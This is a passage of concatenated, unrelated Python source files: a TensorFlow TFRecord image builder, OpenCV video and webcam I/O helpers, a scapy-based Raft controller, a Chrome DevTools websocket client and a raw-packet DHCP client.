width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
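# Illustrative sketch (not part of the original script): build and serialize
# an Example proto with dummy JPEG bytes; a real buffer would come from
# _process_image() below.
def _example_convert_to_example():
  example = _convert_to_example('/tmp/dog/img0.jpeg', b'\xff\xd8\xff\xd9',
                                label=1, text='dog', height=4, width=4)
  return example.SerializeToString()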
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
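# Usage sketch (illustrative): decode one JPEG file with the coder above.
def _example_decode_jpeg(filename):
  coder = ImageCoder()
  with tf.gfile.FastGFile(filename, 'rb') as f:
    image = coder.decode_jpeg(f.read())
  return image.shape  # (height, width, 3)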
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
        print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
  spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
      The list of valid labels is held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % labels_file)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
    if not label_index % 100:
      print('Finished finding files in %d of %d classes.' % (
        label_index, len(unique_labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
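# Example invocation (a sketch; the script name and flag values below are
# illustrative placeholders, while the flag names mirror the FLAGS referenced
# above):
#
#   python build_image_data.py \
#       --train_directory=./train \
#       --validation_directory=./validation \
#       --output_directory=./tfrecords \
#       --labels_file=./labels.txt \
#       --train_shards=128 --validation_shards=24 --num_threads=8
#
# train_shards and validation_shards must both be divisible by num_threads,
# as enforced by the asserts in main().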
|
lib_images_io.py
|
#!/usr/bin/env python
'''
Classes for reading images from video, folder, or web camera,
and for writing images to video file.
Main classes and functions:
* Read:
class ReadFromFolder
class ReadFromVideo
class ReadFromWebcam
* Write:
class VideoWriter
* Display:
class ImageDisplayer
* Test:
def test_ReadFromWebcam
'''
import os
import warnings
import numpy as np
import cv2
import time
import glob
import threading
import queue
import multiprocessing
class ReadFromFolder(object):
    ''' An image reader class for reading images from a folder.
    By default, all files under the folder are considered image files.
    '''
def __init__(self, folder_path):
self.filenames = sorted(glob.glob(folder_path + "/*"))
self.cnt_imgs = 0
self.cur_filename = ""
def read_image(self):
if self.cnt_imgs >= len(self.filenames):
return None
self.cur_filename = self.filenames[self.cnt_imgs]
img = cv2.imread(self.cur_filename, cv2.IMREAD_UNCHANGED)
self.cnt_imgs += 1
return img
def __len__(self):
return len(self.filenames)
def has_image(self):
return self.cnt_imgs < len(self.filenames)
    def stop(self):
        pass
class ReadFromVideo(object):
def __init__(self, video_path, sample_interval=1):
''' A video reader class for reading video frames from video.
Arguments:
video_path
sample_interval {int}: sample every kth image.
'''
if not os.path.exists(video_path):
raise IOError("Video not exist: " + video_path)
assert isinstance(sample_interval, int) and sample_interval >= 1
self.cnt_imgs = 0
        self._is_stopped = False
self._video = cv2.VideoCapture(video_path)
ret, image = self._video.read()
self._next_image = image
self._sample_interval = sample_interval
self._fps = self.get_fps()
        if self._fps < 0.0001:
            warnings.warn("Invalid fps of video: {}".format(video_path))
def has_image(self):
return self._next_image is not None
def get_curr_video_time(self):
return 1.0 / self._fps * self.cnt_imgs
def read_image(self):
image = self._next_image
for i in range(self._sample_interval):
if self._video.isOpened():
ret, frame = self._video.read()
self._next_image = frame
else:
self._next_image = None
break
self.cnt_imgs += 1
return image
def stop(self):
self._video.release()
        self._is_stopped = True
def __del__(self):
        if not self._is_stopped:
self.stop()
def get_fps(self):
# Find OpenCV version
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
# With webcam get(CV_CAP_PROP_FPS) does not work.
# Let's see for ourselves.
# Get video properties
if int(major_ver) < 3:
fps = self._video.get(cv2.cv.CV_CAP_PROP_FPS)
else:
fps = self._video.get(cv2.CAP_PROP_FPS)
return fps
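# A short usage sketch for ReadFromVideo (the video path is illustrative):
#
#   reader = ReadFromVideo("data/example.avi", sample_interval=2)
#   while reader.has_image():
#       img = reader.read_image()  # every 2nd frame, given sample_interval=2
#       print(reader.get_curr_video_time())
#   reader.stop()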
class ReadFromWebcam(object):
def __init__(self, max_framerate=30.0, webcam_idx=0):
''' Read images from web camera.
Argument:
max_framerate {float}: the real framerate will be reduced below this value.
webcam_idx {int}: index of the web camera on your laptop. It should be 0 by default.
'''
# Settings
self._max_framerate = max_framerate
queue_size = 3
# Initialize video reader
self._video = cv2.VideoCapture(webcam_idx)
        self._is_stopped = False
# Use a thread to keep on reading images from web camera
self._imgs_queue = queue.Queue(maxsize=queue_size)
self._is_thread_alive = multiprocessing.Value('i', 1)
self._thread = threading.Thread(
target=self._thread_reading_webcam_images)
self._thread.start()
# Manually control the framerate of the webcam by sleeping
self._min_dt = 1.0 / self._max_framerate
self._prev_t = time.time() - 1.0 / max_framerate
def read_image(self):
dt = time.time() - self._prev_t
if dt <= self._min_dt:
time.sleep(self._min_dt - dt)
self._prev_t = time.time()
image = self._imgs_queue.get(timeout=10.0)
return image
def has_image(self):
        return True  # The web camera always has a new image
def stop(self):
self._is_thread_alive.value = False
self._video.release()
        self._is_stopped = True
def __del__(self):
        if not self._is_stopped:
self.stop()
def _thread_reading_webcam_images(self):
while self._is_thread_alive.value:
ret, image = self._video.read()
if self._imgs_queue.full(): # if queue is full, pop one
img_to_discard = self._imgs_queue.get(timeout=0.001)
self._imgs_queue.put(image, timeout=0.001) # push to queue
print("Web camera thread is dead.")
class VideoWriter(object):
def __init__(self, video_path, framerate):
# -- Settings
self._video_path = video_path
self._framerate = framerate
# -- Variables
self._cnt_img = 0
# initialize later when the 1st image comes
self._video_writer = None
self._width = None
self._height = None
# -- Create output folder
folder = os.path.dirname(video_path)
if not os.path.exists(folder):
os.makedirs(folder)
def write(self, img):
self._cnt_img += 1
if self._cnt_img == 1: # initialize the video writer
fourcc = cv2.VideoWriter_fourcc(*'XVID') # define the codec
self._width = img.shape[1]
self._height = img.shape[0]
self._video_writer = cv2.VideoWriter(
self._video_path, fourcc, self._framerate, (self._width, self._height))
self._video_writer.write(img)
def stop(self):
self.__del__()
def __del__(self):
if self._cnt_img > 0:
self._video_writer.release()
print("Complete writing {}fps and {}s video to {}".format(
self._framerate, self._cnt_img/self._framerate, self._video_path))
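# A short usage sketch for VideoWriter (path, framerate, and the reader object
# are illustrative); the writer initializes itself lazily from the first
# image's shape:
#
#   writer = VideoWriter("output/video.avi", framerate=10)
#   while reader.has_image():
#       writer.write(reader.read_image())
#   writer.stop()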
class ImageDisplayer(object):
''' A simple wrapper of using cv2.imshow to display image '''
def __init__(self):
self._window_name = "cv2_display_window"
cv2.namedWindow(self._window_name)
def display(self, image, wait_key_ms=1):
cv2.imshow(self._window_name, image)
cv2.waitKey(wait_key_ms)
def __del__(self):
cv2.destroyWindow(self._window_name)
def test_ReadFromWebcam():
''' Test the class ReadFromWebcam '''
webcam_reader = ReadFromWebcam(max_framerate=10)
img_displayer = ImageDisplayer()
import itertools
for i in itertools.count():
img = webcam_reader.read_image()
if img is None:
break
print(f"Read {i}th image...")
img_displayer.display(img)
print("Program ends")
if __name__ == "__main__":
test_ReadFromWebcam()
|
Controller.py
|
from scapy.all import *
from packet_sender import Raft, send_no_reply, COMMANDS
from threading import Event
from utils.Switch_Register_Manager import CustomConsole
from timeit import default_timer as timer
import argparse
import logging
import random
import threading
import time
RANDOM_TIMEOUT = {'min': 150, 'max': 300} # min max values in ms
RAFT_HEARTBEAT_RATE = 50
STATUSES = {'follower': 0, 'candidate': 1, 'leader': 2}
RAFT_PROTOCOL_DSTPORT = 0x9998
IP_MULTICAST_ADDRESS = '224.0.255.255'
logging_format = '%(asctime)-15s [%(threadName)s] - [%(funcName)s] %(message)s'
level = logging.DEBUG # Change to Error or something like that to silence the log to file!
logging.basicConfig(filename='./logs/controller.log', level=level, format=logging_format)
logger = logging.getLogger()
class Controller(object):
def __init__(self, controller_ip):
self.status = STATUSES['follower']
self.timeout_thread = None
self.controller_ip = controller_ip
#self.nodes_id_map = {'10.0.1.254': 1, '10.0.2.254': 2, '10.0.3.254': 3, '10.0.4.254': 4, '10.0.5.254': 5}
        self.nodeID = args.ID  # the raft node this controller manages
self.term = 0
self.logIndex = 0
self.counter_new_request = 0
self.counter_rejected_requests = 0
self.sniffer = AsyncSniffer(
iface='ve_A',
lfilter=is_ingoing_raft_packet,
prn=lambda _pkt: self.handle_packet(_pkt)
)
self.sniffer.start()
self.heartbeat_loop_thread = threading.Thread(target=self.heartbeats_loop)
self.heartbeat_loop_thread.start()
self.time = None
self.init_timeout() # starting as follower, we need to start the timeout
def handle_packet(self, packet):
if packet[Raft].messageType == COMMANDS['RequestVote'] and packet[Raft].sourceID == self.nodeID:
self.status = STATUSES['candidate']
self.time = timer()
print('vote request: -> state: {};'.format(self.status))
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and packet[Raft].sourceID == self.nodeID: # received the heartbeat from node -> node has won the election
if self.status == STATUSES['candidate']:
print('won election -> status = leader')
print('time elapsed (in ms): {}'.format((timer() - self.time)*1000))
self.status = STATUSES['leader']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
if packet[Raft].messageType == COMMANDS['HeartBeatRequest'] and not packet[Raft].sourceID == self.nodeID:
# apparently doesn't work maybe because sourceID is overwritten somewhere in the pipeline before packet gets cloned
#if self.status == STATUSES['leader']:
print('stepping down not working')
self.status = STATUSES['follower']
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
if packet[Raft].messageType == COMMANDS['HeartBeatResponse']: # received a cloned heartbeat response from node -> reset timeout
#print('resetting timeout; response to destinationID: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
if self.status == STATUSES['leader']:
print('stepping down as leader.')
self.status = STATUSES['follower']
self.init_timeout()
if packet[Raft].messageType == COMMANDS['AppendEntriesReply']: # received a cloned AppendEntries response from node -> reset timeout
#print('resetting timeout; AppendEntries from: {}'.format(packet[Raft].destinationID))
#print('state : {}'.format(self.status))
self.term = packet[Raft].currentTerm
self.logIndex = packet[Raft].logIndex
self.init_timeout()
if packet[Raft].messageType == COMMANDS['AppendEntries']:
print('starting Transaction: {}'.format(time.time()))
if packet[Raft].messageType == COMMANDS['NewRequest'] and self.status == STATUSES['leader']:
# received a redirected New Request from a client
# new request can be made only by controllers
self.counter_new_request += 1
print('New Request received; total: {}; time: {}'.format(self.counter_new_request, time.time()))
packet[Raft].sourceID = 0x0
packet[Raft].destinationID = self.nodeID
            packet[IP].src = args.source
#packet[Raft].show()
send_no_reply(packet)
if (self.counter_new_request % 50) == 0 and self.nodeID == 4: # emulating failure
import os
print('emulating failure')
os._exit(0)
if packet[Raft].messageType == COMMANDS['RejectNewRequest']:
self.counter_rejected_requests += 1
print('New request rejected; total {}'.format(self.counter_rejected_requests))
#print('state : {}'.format(self.status))
if packet[Raft].messageType == COMMANDS['CommitValue']:
print('Transaction complete. time: {}'.format(time.time()))
if packet[Raft].messageType == COMMANDS['RetrieveLog']:
print('Retrieved Value: {} at Index: {}'.format(packet[Raft].data, packet[Raft].logIndex))
#logger.debug(packet.sprintf())
#packet[Raft].show()
def raft_timeout(self):
return random.randrange(RANDOM_TIMEOUT['min'], RANDOM_TIMEOUT['max']) / 1000
def reset_timeout(self):
self.election_time = time.time() + self.raft_timeout()
def init_timeout(self):
self.reset_timeout()
# safety guarantee, timeout thread may expire after election
if self.timeout_thread and self.timeout_thread.is_alive():
return
self.timeout_thread = threading.Thread(target=self.timeout_loop)
self.timeout_thread.start()
def heartbeats_loop(self):
rate = RAFT_HEARTBEAT_RATE / 1000
while True: # todo find a way to block this thread in a more clever way
if self.status == STATUSES['leader']:
#print('sending StartHeartbeat')
self.send_heartbeat_request()
time.sleep(rate)
else:
time.sleep(rate)
return
# the timeout function
def timeout_loop(self):
# only stop timeout thread when winning the election
while self.status != STATUSES['leader']:
delta = self.election_time - time.time()
if delta < 0:
self.start_election()
self.reset_timeout()
else:
time.sleep(delta)
return
def start_election(self):
print('starting election')
#logger.debug("{} starting election; status: {}, term:{}".format(self.controller_ip, self.status, self.term))
self.term += 1
start_election_message = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['Timeout']
)
send_no_reply(start_election_message)
def send_heartbeat_request(self):
#print("Sending heartbeat request")
#logger.debug("Starting HEARTBEATS")
heartbeat = Raft.raft_packet(
sourceID=0x0,
destinationID=self.nodeID,
data=0x0,
logIndex=self.logIndex,
srcIP=args.source,
dstIP=IP_MULTICAST_ADDRESS,
currentTerm=self.term,
messageType=COMMANDS['StartHeartbeat']
)
send_no_reply(heartbeat)
# def main_handle_packet(packet):
# packet[Raft].show()
def is_ingoing_raft_packet(_packet):
if _packet.haslayer(IP):
        if _packet[IP].proto != 1:  # skip ICMP
if _packet.haslayer(UDP):
if _packet[UDP].dport == RAFT_PROTOCOL_DSTPORT:
if _packet.haslayer(Raft):
#return True
if _packet[Raft].sourceID != 0x0:
return True
return False
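# Example invocation (a sketch; the address and ID are illustrative). Each
# controller instance manages one raft node and sniffs on the hard-coded
# 've_A' interface:
#
#   python Controller.py --source 10.0.2.1 --ID 2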
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Raft Packet Sender')
parser.add_argument(
'-s', '--source', help='select the node IP (default=10.0.1.1)', default='10.0.1.1', required=False,
type=str
)
parser.add_argument(
'-i', '--ID', help='ID of raft node', default='1', required=False,
type=int
)
args = parser.parse_args()
controller = Controller(args.source)
print('starting controller')
while True: # useless, only to keep the main thread alive
time.sleep(10)
|
cdp.py
|
import threading
import json
import websocket
from websocket import WebSocketTimeoutException, WebSocketConnectionClosedException
from types import FunctionType
from typing import Callable, Union
from .request import CDPRequest
from .response import CDPResponse
from .events import Events
from ..utils.logger import debug, info, warn, error
class CDP:
def __init__(self, ws_url, timeout=1):
self.ws_url = ws_url
self.timeout = timeout
self._tag = f'[T_{threading.get_ident()} ChromeDevTools]'
self._stop = threading.Event()
self._ws = None
self._ws_loop_th = None
self._is_running = False
self._id = 0
def __default_request_handler(request: CDPRequest) -> None:
request.resume()
self._event_handlers = {
'request': __default_request_handler,
'response': None
}
def __ws_loop(self):
"""
Loop to receive messages from websocket server
:return:
"""
while not self._stop.is_set():
try:
msg = self._ws.recv()
parsed = json.loads(msg)
# Intercept request/response
if 'method' in parsed:
event = parsed['method']
# Request handler
if event == Events.REQUEST.value:
if self._event_handlers['request'] is not None:
request = CDPRequest(self, parsed)
self._event_handlers['request'](request)
# Response handler
if event == Events.RESPONSE.value:
if self._event_handlers['response'] is not None:
response = CDPResponse(self, parsed)
self._event_handlers['response'](response)
            except (WebSocketTimeoutException, WebSocketConnectionClosedException):
                continue
def call_method(self, method: str, **params) -> None:
"""
Call dev tools method with the given parameters
:param method: str
:param params:
:return: None
"""
if not self._ws or not self._ws.connected:
raise RuntimeError(self._tag + '\tWebsocket not connected')
self._id += 1
msg = {'id': self._id, 'method': method, 'params': params}
debug(self._tag, 'Calling method', msg)
self._ws.send(json.dumps(msg))
def start(self) -> None:
"""
Start ChromeDevTools client
:return: None
"""
if self._is_running:
            raise RuntimeError(self._tag + '\tIt is already running')
debug(self._tag, 'Connecting to websocket', self.ws_url)
self._ws = websocket.create_connection(self.ws_url, enable_multithread=True, skip_utf8_validation=True)
self._ws.settimeout(self.timeout)
# Enable Fetch domain
self.call_method('Fetch.enable')
# Enable Network domain
self.call_method('Network.enable')
self._stop.clear()
self._ws_loop_th = threading.Thread(target=self.__ws_loop, daemon=True)
debug(self._tag, 'Starting websocket loop thread', self._ws_loop_th.ident)
self._ws_loop_th.start()
self._is_running = True
def stop(self) -> None:
"""
Stop ChromeDevTools client
:return: None
"""
self._stop.set()
if self._ws_loop_th:
self._ws_loop_th.join()
self._is_running = False
debug(self._tag, 'Closing websocket')
self._ws.close()
def on(self, event: str, cb: Union[Callable, None]) -> None:
"""
Override event handler
:param event: str
:param cb: Callable | None
:return: None
"""
if cb is not None and not isinstance(cb, FunctionType):
raise ValueError(self._tag + '\tCallback must be a function')
if event not in self._event_handlers.keys():
raise ValueError(self._tag + f'\tEvent must be one of ({", ".join(self._event_handlers.keys())})')
self._event_handlers[event] = cb
def set_user_agent(self, ua: str) -> None:
"""
Set user agent
:param ua: str
:return: None
"""
debug(self._tag, 'Setting user agent', ua)
self.call_method('Network.setUserAgentOverride', userAgent=ua)
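# A minimal usage sketch (the websocket URL is a placeholder; a real one can
# be obtained from a Chrome instance started with --remote-debugging-port):
#
#   cdp = CDP('ws://127.0.0.1:9222/devtools/page/<target-id>')
#   cdp.on('request', lambda req: req.resume())  # override default handler
#   cdp.start()
#   cdp.set_user_agent('MyAgent/1.0')
#   ...
#   cdp.stop()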
|
Client2.py
|
import ipaddress
import random
import socket
import struct
import sys
from random import randint
from time import *
import threading
import math
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 68))
Mac = ""
XID = ""
BACKOFF_CUTOFF = 120
INITIAL_INTERVAL = 10
dis_time = 10
expire = False
def buildPacket_discovery(mac):
mac = str(mac).replace(":", "")
mac = bytes.fromhex(mac)
global Mac, XID
Mac = mac
print(Mac)
transactionID = b''
for i in range(4):
t = randint(0, 255)
transactionID += struct.pack('!B', t)
XID = transactionID
packet = b''
packet += b'\x01' # Message type: Boot Request (1)
packet += b'\x01' # Hardware type: Ethernet
packet += b'\x06' # Hardware address length: 6
packet += b'\x00' # Hops: 0
packet += transactionID # Transaction ID
packet += b'\x00\x00' # Seconds elapsed: 0
    packet += b'\x80\x00' # Bootp flags: 0x8000 (Broadcast)
packet += b'\x00\x00\x00\x00' # Client IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Your (client) IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Next server IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' # Relay agent IP address: 0.0.0.0
packet += mac
packet += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
packet += b'\x00' * 67 # Server host name
    packet += b'\x00' * 125 # Boot file name
packet += b'\x63\x82\x53\x63' # Magic cookie: DHCP
    # Option 53: DHCP Message Type
    packet += b'\x35\x01\x01' # (t=53, l=1) DHCP Discover
return packet
def buildPacket_request(serverip, offerip):
offerip = bytes(map(int, str(offerip).split('.')))
serverip = bytes(map(int, str(serverip).split('.')))
global Mac
packet = b''
packet += b'\x01' # Message type: Boot Request (1)
packet += b'\x01' # Hardware type: Ethernet
packet += b'\x06' # Hardware address length: 6
packet += b'\x00' # Hops: 0
# print(xid_hex)
packet += XID # Transaction ID
packet += b'\x00\x00' # Seconds elapsed: 0
packet += b'\x80\x00' # Bootp flags: 0x8000 (Broadcast) + reserved flags
packet += b'\x00\x00\x00\x00' # Client IP address: 0.0.0.0
    packet += offerip # Your (client) IP address: the offered address
    packet += serverip # Next server IP address: the DHCP server address
packet += b'\x00\x00\x00\x00' # Relay agent IP address: 0.0.0.0
packet += Mac
packet += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # Client hardware address padding: 00000000000000000000
packet += b'\x00' * 67 # Server host name not given
packet += b'\x00' * 125 # Boot file name not given
packet += b'\x63\x82\x53\x63' # Magic cookie: DHCP
    # Option 53: DHCP Message Type
    packet += b'\x35\x01\x03' # (t=53, l=1) DHCP Request
return packet
def pkt_type(packet):
if packet[len(packet) - 1] == 2:
return "DHCPOFFER"
if packet[len(packet) - 1] == 5:
return "DHCPACK"
def parse_packet_client(pkt):
yiaddr_bytes = pkt[16:20]
yiaddr_original = ipaddress.IPv4Address(yiaddr_bytes)
siaddr_bytes = pkt[20:24]
siaddr_original = ipaddress.IPv4Address(siaddr_bytes)
mac_byte = pkt[28:34]
mac_original = mac_byte.hex(":")
return yiaddr_original, siaddr_original, mac_original
def start_process(mac):
print("Start Process")
global dis_time
sock.sendto(buildPacket_discovery(mac), ('<broadcast>', 67))
get_ip = False
getAck = False
finish = False
msg, b = sock.recvfrom(1024)
try:
data = msg.decode('utf-8')
print(data)
if "renew" in data:
getAck = True
get_ip = True
            timer_thread = threading.Thread(target=lease_expire)
timer_thread.start()
elif "blocked" or "reserved" in data:
finish = True
quit()
except (UnicodeDecodeError, AttributeError):
print(pkt_type(msg))
offerip, serverip, mac = parse_packet_client(msg)
print(offerip)
sock.sendto(buildPacket_request(serverip, offerip), (str(serverip), 67))
print("send request")
getAck = False
sock.settimeout(2)
try:
msg, b = sock.recvfrom(1024)
if msg:
print("Ack {}".format(msg))
getAck = True
except socket.timeout:
print("Time out ...")
if getAck == False:
print("time out!!")
else:
print("No time out :)")
get_ip = True
            timer_thread = threading.Thread(target=lease_expire)
timer_thread.start()
return getAck, get_ip, finish
def discovery_timer(initial_interval):
global dis_time
dis_time = initial_interval
while dis_time:
mins, secs = divmod(dis_time, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
# print(timer)
sleep(1)
dis_time -= 1
def lease_expire():
print("expire timer begin")
global expire
lease = 11
while lease > 0:
mins, secs = divmod(lease, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
print(timer)
sleep(1)
lease -= 1
expire = True
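# The retransmission backoff implemented inline in the main loop below can be
# summarized by this illustrative helper (a hypothetical name, not called by
# the loop itself): each retry interval is the previous interval doubled and
# scaled by a random factor, and is clamped to BACKOFF_CUTOFF once it has
# grown past the cutoff. With rand = 0.8: 10 -> 16 -> 25 -> 40 -> 64 -> ...
def next_discovery_interval(prev_interval, rand):
    if prev_interval >= BACKOFF_CUTOFF:
        return BACKOFF_CUTOFF
    return math.floor(prev_interval * 2 * rand)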
if __name__ == '__main__':
def discovery_timer(initial_interval):
print("discovery timer begin")
global dis_time
dis_time = initial_interval
while dis_time:
mins, secs = divmod(dis_time, 60)
timer = '{:02d}:{:02d}'.format(mins, secs)
# print(timer)
sleep(1)
dis_time -= 1
mac = input("Enter your mac address")
offer_ip = ""
flag = True
getAck = False
getIp = False
prv_dis = INITIAL_INTERVAL
while True:
timer_thread = threading.Thread(target=discovery_timer, args=(dis_time,))
timer_thread.start()
while dis_time > 0:
while not getAck:
